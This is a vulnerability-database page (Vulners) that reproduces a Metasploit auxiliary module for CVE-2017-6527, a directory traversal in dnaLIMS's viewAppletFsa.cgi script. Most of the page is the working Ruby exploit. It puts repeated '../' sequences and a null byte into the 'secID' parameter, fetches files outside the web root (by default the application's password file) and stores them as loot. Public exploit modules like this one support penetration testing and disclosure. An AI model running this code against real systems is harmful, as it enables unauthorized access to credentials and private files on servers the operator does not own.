Lucene search
K

DnaLIMS Directory Traversal

🗓️ 20 Mar 2017 14:40:43Reported by h00die <[email protected]>, flakey_biscuit <[email protected]>Type 
metasploit
 metasploit
🔗 www.rapid7.com👁 21 Views

Exploits directory traversal in dnaLIMS to read files outside the www directory

Related
Code
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
  include Msf::Auxiliary::Scanner
  include Msf::Auxiliary::Report
  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'DnaLIMS Directory Traversal',
      'Description'    => %q{
          This module exploits a directory traversal vulnerability found in dnaLIMS.
        Due to the way the viewAppletFsa.cgi script handles the 'secID' parameter, it is possible
        to read a file outside the www directory.
      },
      'References'     =>
        [
          ['CVE', '2017-6527'],
          ['US-CERT-VU', '929263'],
          ['URL', 'https://www.shorebreaksecurity.com/blog/product-security-advisory-psa0002-dnalims/']
        ],
      'Author'         =>
        [
          'h00die <[email protected]>',    # Discovery, PoC
          'flakey_biscuit <[email protected]>'  # Discovery, PoC
        ],
      'License'        => MSF_LICENSE,
      'DisclosureDate' => '2017-03-08'
    ))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The base path to dnaLIMS', '/cgi-bin/dna/']),
        OptString.new('FILE', [ true,  "The path to the file to view", '/home/dna/spool/.pfile']), # password db for app
        OptInt.new('DEPTH', [true, 'The traversal depth', 4])
      ])
  end

  def run_host(ip)
    file     = (datastore['FILE'][0,1] == '/') ? datastore['FILE'] : "#{datastore['FILE']}"
    traverse = "../" * datastore['DEPTH']
    uri      = normalize_uri(target_uri.path)
    base     = File.dirname("#{uri}/.")

    print_status("Requesting: #{file} - #{rhost}")
    res = send_request_cgi({
      'uri'      => "#{base}/viewAppletFsa.cgi",
      'vars_get' => { 'secID' => "#{traverse}#{file}%00",
                     'Action' => 'blast',
                    'hidenav' => '1'
      }
    })

    if not res
      print_error("No response from server.")
      return
    end

    if res.code != 200
      print_error("Server returned a non-200 response (body will not be saved):")
      print_line(res.to_s)
      return
    end

    vprint_good(res.body)
    p = store_loot('dnaLIMS.traversal.file', 'application/octet-stream', ip, res.body, File.basename(file))
    print_good("File saved as: #{p}")
  end
end


Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

02 Oct 2020 20:00Current
7.4High risk
Vulners AI Score7.4
CVSS 25
CVSS 37.5
EPSS0.56647
21